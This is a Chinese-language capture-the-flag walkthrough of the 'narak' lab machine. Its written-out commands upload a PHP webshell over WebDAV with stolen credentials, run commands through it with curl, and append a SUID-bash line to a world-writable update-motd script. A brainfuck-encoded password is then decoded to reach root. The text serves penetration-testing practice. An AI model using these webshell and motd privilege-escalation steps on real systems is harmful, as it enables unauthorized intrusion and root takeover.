跳转至

narak

知识整理
对UDP端口的探测
webdav的利用
motd文件提权
brainfuck

user shell

目标IP:192.168.205.136

端口信息

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

web路径扫描

得到信息

http://192.168.205.136/webdav webdav
http://192.168.205.136/tips.txt 

image-20231010151434757

web路径下没有发现creds.txt,也没有其他tcp文件服务,探测一下tftp

69/udp open|filtered tftp

image-20231010151726802

拿到webdav凭据,尝试上传文件

auth=$(base64 -d creds.txt) 
davtest --auth $auth --url http://192.168.205.136/webdav --uploadfile shell.php --uploadloc w.php

成功拿到webshell

curl --anyauth --user $auth "http://192.168.205.136/webdav/w.php?code=system('whoami')%3b"

反弹shell,拿到www-data权限

root shell

枚举

find / -perm -ug=rwx -type f 2>/dev/null
/etc/update-motd.d/91-release-upgrade
/etc/update-motd.d/00-header
/etc/update-motd.d/50-motd-news
/etc/update-motd.d/80-esm
/etc/update-motd.d/80-livepatch
/etc/update-motd.d/10-help-text

motd文件提权

https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/update-motd-privilege-escalation/

echo "cp /bin/bash /home/inferno/bash && chmod u+s /home/inferno/bash" >> /etc/update-motd.d/00-header

但是需要ssh连接成功才可以提权,我们还没有密码

ls -alih /mnt
total 16K
917506 drwxr-xr-x  3 root   root 4.0K Sep 22  2020 .
     2 drwxr-xr-x 22 root   root 4.0K Sep 21  2020 ..
920902 -rwxrwxrwx  1 root   root  124 Sep 22  2020 hell.sh
920657 drwxr-xr-x  2 nobody root 4.0K Sep 21  2020 karma
--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.

hell.sh一段brainfuck

https://www.splitbrain.org/services/ook

解码得到chitragupt,经过尝试,是inferno的密码

ssh连接

./bash -p

拿到root权限